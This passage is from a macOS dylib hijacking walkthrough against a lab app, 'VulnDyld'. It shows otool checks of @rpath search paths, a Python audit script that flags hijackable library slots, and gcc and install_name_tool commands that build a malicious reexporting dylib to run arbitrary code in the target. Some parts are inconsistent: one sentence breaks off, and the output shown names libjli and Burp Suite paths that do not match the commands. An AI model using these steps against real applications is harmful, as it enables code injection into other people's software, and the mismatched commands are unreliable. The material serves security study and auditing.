```bash
# Check where the @rpath locations are
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2
          cmd LC_RPATH
      cmdsize 32
         path @loader_path/. (offset 12)
--
          cmd LC_RPATH
      cmdsize 32
         path @loader_path/../lib2 (offset 12)

# Check libraries loaded using @rpath and the versions used
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3
         name @rpath/lib.dylib (offset 24)
   time stamp 2 Thu Jan  1 01:00:02 1970
      current version 1.0.0
compatibility version 1.0.0
# Check the versions
```
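The manual `otool` inspection above can be turned into an audit check: resolve each `@rpath` dependency against the binary's `LC_RPATH` entries in search order and flag any dependency whose first candidate path does not exist while a later one does, since a missing earlier candidate is exactly the slot a planted dylib would fill. This is an added example, not code from the original page; the `otool` text is constructed from the output shown above, and the `exists` callback is injected so the check runs offline (pass `os.path.exists` on a real system).

```python
import os
import posixpath
import re

# Constructed sample: the LC_RPATH and @rpath dependency lines shown on this page
SAMPLE_OTOOL_OUTPUT = """\
          cmd LC_RPATH
      cmdsize 32
         path @loader_path/. (offset 12)
          cmd LC_RPATH
      cmdsize 32
         path @loader_path/../lib2 (offset 12)
          cmd LC_LOAD_DYLIB
      cmdsize 48
         name @rpath/lib.dylib (offset 24)
   time stamp 2 Thu Jan  1 01:00:02 1970
      current version 1.0.0
compatibility version 1.0.0
"""
DYLIB_CMDS = ("LC_LOAD_DYLIB", "LC_LOAD_WEAK_DYLIB", "LC_REEXPORT_DYLIB")

def parse_load_commands(otool_text):
    """Return (rpaths, dylib install names) in the order they appear in `otool -l` output."""
    rpaths, dylibs, current = [], [], None
    for line in otool_text.splitlines():
        cmd = re.match(r"\s*cmd (LC_\w+)", line)
        if cmd:
            current = cmd.group(1)
            continue
        m = re.match(r"\s*(path|name) (\S+) \(offset \d+\)", line)
        if m and current == "LC_RPATH" and m.group(1) == "path":
            rpaths.append(m.group(2))
        elif m and current in DYLIB_CMDS and m.group(1) == "name":
            dylibs.append(m.group(2))
    return rpaths, dylibs

def expand_rpath(rpath, binary_path, executable_path):
    """Expand @loader_path / @executable_path relative to the binary being inspected."""
    expanded = rpath.replace("@loader_path", posixpath.dirname(binary_path))
    expanded = expanded.replace("@executable_path", posixpath.dirname(executable_path))
    return posixpath.normpath(expanded)

def hijackable_dylibs(otool_text, binary_path, exists, executable_path=None):
    """Map each @rpath dependency to the missing candidate paths dyld would try
    before reaching the existing library; an empty dict means nothing to fix."""
    rpaths, dylibs = parse_load_commands(otool_text)
    executable_path = executable_path or binary_path
    findings = {}
    for dylib in (d for d in dylibs if d.startswith("@rpath/")):
        rel = dylib[len("@rpath/"):]
        candidates = [posixpath.join(expand_rpath(r, binary_path, executable_path), rel) for r in rpaths]
        first_hit = next((i for i, c in enumerate(candidates) if exists(c)), None)
        if first_hit:  # None (never found) or 0 (first candidate is the real one) are not flagged
            findings[dylib] = candidates[:first_hit]
    return findings

if __name__ == "__main__":
    binary = "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
    for dylib, gaps in hijackable_dylibs(SAMPLE_OTOOL_OUTPUT, binary, os.path.exists).items():
        print(dylib, "would first be searched at:", gaps)
```

Any path the check reports must be in a directory that is not writable by unprivileged users, or the binary must enforce library validation, for the finding to be harmless.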
From the information gathered above we know that it does not check the signature of the libraries it loads and that it tries to load a library from:
Therefore, it is easy to hijack! Create a library that executes arbitrary code and exports the same functions as the legitimate library by reexporting it. And remember to compile it with the expected version:
```bash
gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport
```
The reexport path written into the library is relative to the loader; let's change it to an absolute path to the library being reexported:
```bash
# Check the relative path
otool -l /tmp/lib.dylib | grep REEXPORT -A 2
          cmd LC_REEXPORT_DYLIB
      cmdsize 48
         name @rpath/libjli.dylib (offset 24)

# Change the location of the library from a relative to an absolute path
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib

# Check again
otool -l /tmp/lib.dylib | grep REEXPORT -A 2
          cmd LC_REEXPORT_DYLIB
      cmdsize 128
         name /Applications/BurpSuiteProfessional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)
```
If you plan to try injecting libraries into unexpected binaries, you can check the event messages to find out when the library is loaded inside a process (in this case, remove the printf and the /bin/bash execution).